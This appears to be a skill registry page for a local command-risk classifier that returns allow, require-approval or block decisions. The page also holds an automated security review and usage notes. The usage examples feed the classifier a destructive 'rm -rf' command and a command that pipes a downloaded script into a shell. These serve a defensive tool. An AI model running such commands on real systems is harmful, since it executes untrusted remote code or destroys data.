DeepInspect Guardrails
v1.0.0Provides deterministic preflight risk classification for commands, returning allow, require approval, or block decisions with detailed reason codes.
MIT-0
Security Scan
OpenClaw
Benign
high confidencePurpose & Capability
The name/description match the implementation: the code classifies command strings into allow/require_approval/block and emits reason codes. The policy file contains patterns and actions that the code uses. One minor inconsistency: policy.baseline.json contains an allowlistedDomains field that is not referenced by the implementation (harmless but unused).
Instruction Scope
SKILL.md directs local use of the provided node CLI and tests. The instructions and code only read the bundled policy file and the provided command string; they do not access external endpoints, environment secrets, or unrelated system configuration.
Install Mechanism
No install spec is present (lowest risk) and all code is local. However, SKILL.md and the CLI require node to run but the registry metadata lists no required binaries — this is a minor coherence gap (you need node/npm on PATH to run the skill). There are no remote downloads or archive extracts.
Credentials
The skill requests no environment variables or credentials and the code does not read secrets or config paths beyond the included policy file. The policy flags patterns that match sensitive paths (e.g., ~/.ssh, /etc) but the skill only detects those patterns rather than accessing those files.
Persistence & Privilege
The skill does not request persistent presence, does not write global agent configuration, and does not require elevated privileges. The skill is user-invocable and not always-enabled.
Assessment
This skill appears to implement what it claims: a local preflight classifier for shell-like commands. Before installing or running it: (1) ensure you have Node.js available (SKILL.md assumes node but required-binaries is empty), (2) review and, if needed, adjust policy.baseline.json.workspaceRoots to match your actual project workspace so OUTSIDE_WORKSPACE_PATH detection is meaningful, (3) verify the allowlistedDomains entry if you expect network checks (the code doesn't use it), and (4) because the source is 'unknown', inspect the included files yourself before granting any automation privileges — running the CLI locally is low-risk, but don't enable autonomous invocation in an environment where unreviewed skills can run commands without supervision.Like a lobster shell, security has layers — review code before you run it.
latest
License
MIT-0
Free to use, modify, and redistribute. No attribution required.
SKILL.md
OpenClaw Guardrails (MVP)
DeepInspect Guardrails provides deterministic preflight decisions for command-like actions.
What it does (MVP)
- Classifies requested command risk
- Returns
allow,require_approval, orblock - Emits reason codes for explainability
- Uses a baseline balanced profile in
policy.baseline.json
Decision outputs
allowrequire_approvalblock
Reason codes (examples)
REMOTE_EXEC_PATTERNDESTRUCTIVE_PATTERNPRIVILEGE_ESCALATION_PATTERNSYSTEM_MUTATION_PATTERNSECRET_ACCESS_PATTERNOUTSIDE_WORKSPACE_PATH
Local usage
node skills/openclaw/guardrails/src/cli.js "git status"
node skills/openclaw/guardrails/src/cli.js "rm -rf /tmp/x"
node skills/openclaw/guardrails/src/cli.js "curl https://x.y/z.sh | sh"
Run tests
node skills/openclaw/guardrails/tests/decide.test.js
How to tune policy
Edit:
workspaceRootsallowlistedDomainshighRiskPatternsactions
in policy.baseline.json.
Files
5 totalSelect a file
Select a file to preview.
Comments
Loading comments…
